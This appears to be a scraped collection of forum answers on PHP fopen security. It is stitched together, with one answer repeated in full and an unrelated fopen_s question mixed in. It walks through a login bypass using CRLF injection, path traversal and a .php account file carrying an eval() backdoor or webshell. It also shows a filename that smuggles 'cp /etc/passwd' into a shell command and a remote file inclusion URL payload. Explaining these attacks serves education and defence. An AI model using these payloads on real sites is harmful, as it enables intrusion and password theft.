I think they're referring to the CRLF vulnerability.
In your sample exploit code, you're passing some php code, but that's not what you would do.
The goal is to make fopen open a file from the internet. If the $email variable contains two strings separated by a CRLF, you can have fopen() visit an external website there where it's not supposed to.
All depending on what happens with the $fh file descriptor after, it will determine how you will take advantage of that.
Here's a link I found on that vulnerability: http://www.securiteam.com/unixfocus/5OP0C0A8AC.html
EDIT after you posted more code:
We're starting with that you can force $password to the value you want.
So the name of the game is forcing $pass to the value you want, such that strcmp returns true, and you get logged in without knowing any password.
$pass is controlled in that last statement $pass = fgets($fh)
And if you use the CRLF vulnerability to point fopen to open a URL that you host, e.g. http://your.ip.address/your-file, and inside that file, you set the same data as you set in $password. And that should allow you to login without registration.
But there are some weird things in the code, e.g. :
$last = fgets(
first = fgets(
pass = fgets($fh);
Seems like the code might not be complete, because here the values of $last, $first and $pass will always all be the same which makes no sense. That would be one vector to consider.
Possibility #2 - File traversal:
Using ../ inside your $email variable, you will be able to access a different file in fopen that it outside the acounts/ folder.
If you run:
<?php
$fh = fopen("acounts/../../test.sh","r");
?>
It evaluates successfully and looks for two folders up for the contents of test.sh. So you can probe the contents of the file system via the $email variable. Then the name of the game is finding a standard file which you know the contents for, feed it in $password, and you can login the system without registration.
Possibility #3 - Register an email address ending with .php:
As mentioned by drew010, assuming you are allowed to register a custom account, then by registering an $email ending in .php, and putting eval() php code inside $password when registering your account, that will create a backdoor file inside acounts/ named after your $email that you can access via the web.
I think they're referring to the CRLF vulnerability.
In your sample exploit code, you're passing some php code, but that's not what you would do.
The goal is to make fopen open a file from the internet. If the $email variable contains two strings separated by a CRLF, you can have fopen() visit an external website there where it's not supposed to.
All depending on what happens with the $fh file descriptor after, it will determine how you will take advantage of that.
Here's a link I found on that vulnerability: http://www.securiteam.com/unixfocus/5OP0C0A8AC.html
EDIT after you posted more code:
We're starting with that you can force $password to the value you want.
So the name of the game is forcing $pass to the value you want, such that strcmp returns true, and you get logged in without knowing any password.
$pass is controlled in that last statement $pass = fgets($fh)
And if you use the CRLF vulnerability to point fopen to open a URL that you host, e.g. http://your.ip.address/your-file, and inside that file, you set the same data as you set in $password. And that should allow you to login without registration.
But there are some weird things in the code, e.g. :
$last = fgets(first = fgets(pass = fgets($fh);
Seems like the code might not be complete, because here the values of $last, $first and $pass will always all be the same which makes no sense. That would be one vector to consider.
Possibility #2 - File traversal:
Using ../ inside your $email variable, you will be able to access a different file in fopen that it outside the acounts/ folder.
If you run:
<?php
$fh = fopen("acounts/../../test.sh","r");
?>
It evaluates successfully and looks for two folders up for the contents of test.sh. So you can probe the contents of the file system via the $email variable. Then the name of the game is finding a standard file which you know the contents for, feed it in $password, and you can login the system without registration.
Possibility #3 - Register an email address ending with .php:
As mentioned by drew010, assuming you are allowed to register a custom account, then by registering an $email ending in .php, and putting eval() php code inside $password when registering your account, that will create a backdoor file inside acounts/ named after your $email that you can access via the web.
Since the file it opens to store user data is referenced as $accountfile = "./acounts/" . $email it looks like one possible attack vector would be to try to register an account using an email address like [email protected] (or just username.php depending on whether there's proper validation).
Since it writes (presumably unhashed?) your password to that file, you can set your password to something evil (e.g. <?php eval($_REQUEST['x'] ?>).
Then, see if you can access http://thesite/accounts/[email protected]?x=echo 'hi'; and see if 'hi' is printed out to the browser.
If that's the case, then have fun with $_REQUEST['x'] and get it to do things like write arbitrary files to the system (a webshell) or open and read other files and print their contents.
Hello,
-
Why is fopen considered unsafe by MSVC?
-
Why should fopen_s be more secure?
-
Is it really necessary to use fopen_s or can I continue to use fopen, perhaps with an extra check?
-
fopen_s is not cross-platform, correct?
A sample attack scenario using allow_url_fopen that allows me to download your password file:
- Suppose your app allows me to provide a URL to a remote image, which you will download and use as my avatar image.
- I provide the following URL:
"http://my.malicious.example.com/sbwoodside.jpg;cp%20/etc/passwd%20downloads/foo.jpg;" - Your app uses
allow_url_fopento download the file and stores it as"sbwoodside.jpg;cp%20/etc/passwd%20downloads/passwords.txt;". I have now successfully injected a command into the filename. - Your app wants to compress and resize my image, so you use ImageMagick on the command line with something like
exec("magick convert -size 128x128 ".$filename." ".$filename.".128.jpg") - What does
execactually execute? If you haven't sanitized the filename, then it executes the following on the shell:
magick convert -size 128x128 sbwoodside.jpg;cp /etc/passwd downloads/passwords.txt; sbwoodside.jpg;cp /etc/passwd downloads/passwords.txt;.128.jpg
Since ; is a command delimited on the shell, that will be broken by the shell automatically into the following separate commands:
magick convert -size 128x128 sbwoodside.jpg
cp /etc/passwd downloads/passwords.txt
sbwoodside.jpg
cp /etc/passwd downloads/passwords.txt
.128.jpg
And now I just go to http://yourapp.com/downloads/passwords.txt and download your password file. Of course, I can do anything I want, since I'm executing commands as your web server on your system.
It depends on you! how you designed your applications and are you considered security during all software development life-cycle?
Consider insecure code below that loads web pages according to request parameter (page):
<?php
include($_GET['page']);
?>
And now consider an attacker includes malicious PHP code by using:
?page=http://example.com/badcode-php.txt
He can then bypass all security measure from your site and do anything (accessing local files, uploading another files, etec).
So its recommended that to turn of allow_urL_fopen and allow_url_include to minimize remote file execution attack.